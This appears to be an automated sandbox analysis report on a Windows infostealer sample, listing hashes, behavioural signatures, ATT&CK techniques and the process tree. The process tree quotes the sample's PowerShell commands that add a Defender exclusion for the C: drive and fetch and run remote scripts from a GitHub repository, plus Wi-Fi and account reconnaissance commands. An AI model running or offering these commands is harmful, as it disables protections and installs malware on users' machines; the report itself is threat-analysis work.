Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28/08/2024, 04:24
Behavioral task
behavioral1
Sample
2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe
-
Size
9.1MB
-
MD5
11465eca8be1b364fbbda360d437c855
-
SHA1
25c42bfe635ccf389e2de5e5c194ee6f3794d325
-
SHA256
7d02de7a3e4f7b6d01b58057b4488beecf4e8123f6d24bf0156138e4bc31594a
-
SHA512
5838c8f3638713b1718e821c717817e08392766348ad5adc407c62ecb03a11b3c83162b43f377a26d4cb03409523410029e4e91cbb6ab94c26e806bf14de595d
-
SSDEEP
98304:ViWVwpItpo8Bv/3mSsaixt1qUkFpq9EGyakRUG:SpItpBvqZWpjP4G
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 12 1264 powershell.exe 13 4876 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3108 powershell.exe 4876 powershell.exe 1264 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4808 netsh.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 10 raw.githubusercontent.com 12 raw.githubusercontent.com 13 raw.githubusercontent.com -
pid Process 2172 ARP.EXE -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2980 netsh.exe 2140 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 4172 NETSTAT.EXE -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 4816 ipconfig.exe 4172 NETSTAT.EXE 4780 ipconfig.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3108 powershell.exe 4876 powershell.exe 1264 powershell.exe 1264 powershell.exe 4876 powershell.exe 3108 powershell.exe 1264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeTakeOwnershipPrivilege 1264 powershell.exe Token: SeLoadDriverPrivilege 1264 powershell.exe Token: SeSystemProfilePrivilege 1264 powershell.exe Token: SeSystemtimePrivilege 1264 powershell.exe Token: SeProfSingleProcessPrivilege 1264 powershell.exe Token: SeIncBasePriorityPrivilege 1264 powershell.exe Token: SeCreatePagefilePrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeShutdownPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeSystemEnvironmentPrivilege 1264 powershell.exe Token: SeRemoteShutdownPrivilege 1264 powershell.exe Token: SeUndockPrivilege 1264 powershell.exe Token: SeManageVolumePrivilege 1264 powershell.exe Token: 33 1264 powershell.exe Token: 34 1264 powershell.exe Token: 35 1264 powershell.exe Token: 36 1264 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeTakeOwnershipPrivilege 1264 powershell.exe Token: SeLoadDriverPrivilege 1264 powershell.exe Token: SeSystemProfilePrivilege 1264 powershell.exe Token: SeSystemtimePrivilege 1264 powershell.exe Token: SeProfSingleProcessPrivilege 1264 powershell.exe Token: SeIncBasePriorityPrivilege 1264 powershell.exe Token: SeCreatePagefilePrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeShutdownPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeSystemEnvironmentPrivilege 1264 powershell.exe Token: SeRemoteShutdownPrivilege 1264 powershell.exe Token: SeUndockPrivilege 1264 powershell.exe Token: SeManageVolumePrivilege 1264 powershell.exe Token: 33 1264 powershell.exe Token: 34 1264 powershell.exe Token: 35 1264 powershell.exe Token: 36 1264 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeTakeOwnershipPrivilege 1264 powershell.exe Token: SeLoadDriverPrivilege 1264 powershell.exe Token: SeSystemProfilePrivilege 1264 powershell.exe Token: SeSystemtimePrivilege 1264 powershell.exe Token: SeProfSingleProcessPrivilege 1264 powershell.exe Token: SeIncBasePriorityPrivilege 1264 powershell.exe Token: SeCreatePagefilePrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeShutdownPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeSystemEnvironmentPrivilege 1264 powershell.exe Token: SeRemoteShutdownPrivilege 1264 powershell.exe Token: SeUndockPrivilege 1264 powershell.exe Token: SeManageVolumePrivilege 1264 powershell.exe Token: 33 1264 powershell.exe Token: 34 1264 powershell.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 1068 wrote to memory of 3108 1068 2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe 84 PID 1068 wrote to memory of 3108 1068 2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe 84 PID 1068 wrote to memory of 4876 1068 2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe 86 PID 1068 wrote to memory of 4876 1068 2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe 86 PID 1068 wrote to memory of 1264 1068 2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe 88 PID 1068 wrote to memory of 1264 1068 2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe 88 PID 1264 wrote to memory of 2372 1264 powershell.exe 90 PID 1264 wrote to memory of 2372 1264 powershell.exe 90 PID 2372 wrote to memory of 3352 2372 csc.exe 91 PID 2372 wrote to memory of 3352 2372 csc.exe 91 PID 1264 wrote to memory of 2980 1264 powershell.exe 92 PID 1264 wrote to memory of 2980 1264 powershell.exe 92 PID 1264 wrote to memory of 2456 1264 powershell.exe 97 PID 1264 wrote to memory of 2456 1264 powershell.exe 97 PID 2456 wrote to memory of 4572 2456 net.exe 98 PID 2456 wrote to memory of 4572 2456 net.exe 98 PID 1264 wrote to memory of 4808 1264 powershell.exe 99 PID 1264 wrote to memory of 4808 1264 powershell.exe 99 PID 1264 wrote to memory of 448 1264 powershell.exe 100 PID 1264 wrote to memory of 448 1264 powershell.exe 100 PID 1264 wrote to memory of 3680 1264 powershell.exe 101 PID 1264 wrote to memory of 3680 1264 powershell.exe 101 PID 3680 wrote to memory of 2200 3680 net.exe 102 PID 3680 wrote to memory of 2200 3680 net.exe 102 PID 1264 wrote to memory of 4816 1264 powershell.exe 103 PID 1264 wrote to memory of 4816 1264 powershell.exe 103 PID 1264 wrote to memory of 2096 1264 powershell.exe 104 PID 1264 wrote to memory of 2096 1264 powershell.exe 104 PID 2096 wrote to memory of 1884 2096 net.exe 105 PID 2096 wrote to memory of 1884 2096 net.exe 105 PID 1264 wrote to memory of 116 1264 powershell.exe 106 PID 1264 wrote to memory of 116 1264 powershell.exe 106 PID 1264 wrote to memory of 4172 1264 powershell.exe 109 PID 1264 wrote to memory of 4172 1264 powershell.exe 109 PID 1264 wrote to memory of 1676 1264 powershell.exe 110 PID 1264 wrote to memory of 1676 1264 powershell.exe 110 PID 1264 wrote to memory of 4780 1264 powershell.exe 111 PID 1264 wrote to memory of 4780 1264 powershell.exe 111 PID 1264 wrote to memory of 4376 1264 powershell.exe 112 PID 1264 wrote to memory of 4376 1264 powershell.exe 112 PID 1264 wrote to memory of 2172 1264 powershell.exe 113 PID 1264 wrote to memory of 2172 1264 powershell.exe 113 PID 1264 wrote to memory of 2140 1264 powershell.exe 114 PID 1264 wrote to memory of 2140 1264 powershell.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-28_11465eca8be1b364fbbda360d437c855_poet-rat_snatch.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rtcmtq00\rtcmtq00.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9DC.tmp" "c:\Users\Admin\AppData\Local\Temp\rtcmtq00\CSC3CDD838121E44337A7637CB92AFCDDC4.TMP"4⤵PID:3352
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2980
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:4572
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4808
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵PID:448
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:2200
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
PID:4816
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:1884
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵PID:116
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
PID:4172
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵PID:1676
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
PID:4780
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵PID:4376
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
PID:2172
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2140
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5d067ad73aa478cfa79d1e1f3eb98d62a
SHA193bc212130b29d0cbad857ec448159695f6b89fa
SHA256d5114fe3e9e868d369981f408d7c460b2b156be2aa3c0e67e60ac9c20f0e58cd
SHA512d01079f39ea999288bf54ef2b83413b9bde14a5dfbf0037e77a2a8dfb3bb7f82b625823aeaca7d52884eab26cc43c1c49083c4b0b105d9753505648e487a6738
-
Filesize
1KB
MD5d839ebc1672853c26508c7ff2d757e20
SHA102de89bff5d35220af1cec146fe8a2c29419ec88
SHA2567afeed8ecf1fa791408d6db33ca6a2e570b338ffa33a15ee58020b21849a8ae4
SHA512de91cb0e88689ae4cc1f79190fe439662a2d4ce194da5dcbea724e44a62d981aabb6a89582440974e30f028066fa9d98eed36427210a37c8e59100b2f693dad1
-
Filesize
1KB
MD5672ccfa9a3a79eddc34de31382e9e3ad
SHA11ac13a10798df076a22751cedb576cdf9864c848
SHA2567bb003cb3c6bf78d7453b769eabcea8872c944d46e612bea9a6a2d8e9f0d032c
SHA5120d5d615fee84a632c631975e16c1ca64f04cf3be94e9f074af7443e460e0c9b2887f9c17d9873a99909aa0b2e7ac239cdddb6419ecd4f69ba040e867811c63d7
-
Filesize
432KB
MD51a09d9684596a88c2e6ac28d253b2061
SHA12efa605edce7f4dfd8c0ddf59a160580c5102cab
SHA25631055ae27a83794e3640e464a42af715d01777d49bce77a2fc75dd64b282845b
SHA5125b5e35498cce5a71306398044c0928f3cba41e33c131e26cba4004d416bfe5afabc33d37419bc0d5ce0dc2b2beccfdc0dce13d3b222cf081b742bdc7ae137a34
-
Filesize
23KB
MD52c03cdb28361765b5e18be38c86ae25a
SHA1e1b4a9ea7cb420416178914b5479bd0f90cbed72
SHA256e03437abc0c7e3a8d0c33864dc748923c6ca1be33f0794363dad1aed439f986c
SHA512a3027724372a3a0cdfd2576ca079a20ae15bd2bb176c129371ead87c4e1bf1121ff56316c2dc5369906b4646a0a3076969356bbb94b139fd3d76e6b06fd905ba
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD51d10306e64fa727a6b89b697fd408778
SHA17bc0040d085698e4d8c6cd1ab2371280dec78b28
SHA2568c49c354b4ffbe46dc36ae0af51de38123710b54b98c95302d54339b2f5192e7
SHA51214664d0224ac2dff008eb1d4134b7775aa52e09f1a50f710991f9a7347de7c3c3873e27431e454b285a489ee95d6881c95d9b16f8298e6eb56508bebbbfde350
-
Filesize
652B
MD5ab11d81de9105d743ce0a4c7749d6f57
SHA174c4043ef84f7dba05ceafd8f5b9cd12e222a477
SHA256267b55de61b041ebbba4a293d35ccedd11ce15a8b87cac31f3cb7ae6d8331554
SHA512d79bb9aca2f4c8c4c2b6f674f47bbf016103c09fd8dd21959b64324af52ccc1e0c958c24c97d6cd141954e52c9ae12110819db2bd8cbe17b613285b536a671b6
-
Filesize
1KB
MD58a1e7edb2117ec5dde9a07016905923b
SHA10155dbeeb16333e2eaa767b0209750efee56f47f
SHA256c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007
SHA5124ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21
-
Filesize
369B
MD557b3dcd182bc1b482ce69057135530af
SHA157b9323e12501549e1a169ea70efc466ce7fceff
SHA2567d4490b4d140ccf6960872fd678802acaeee0c30e0216bf8509d5402ebcf1210
SHA512844182c6c15c158270f75338cecb2510ef3e3a313640a9a1fb032c364b74ac01d06cafa9d3b0c0d8e634142b16524a540cf1a733ca3f13f5f297d72f94103606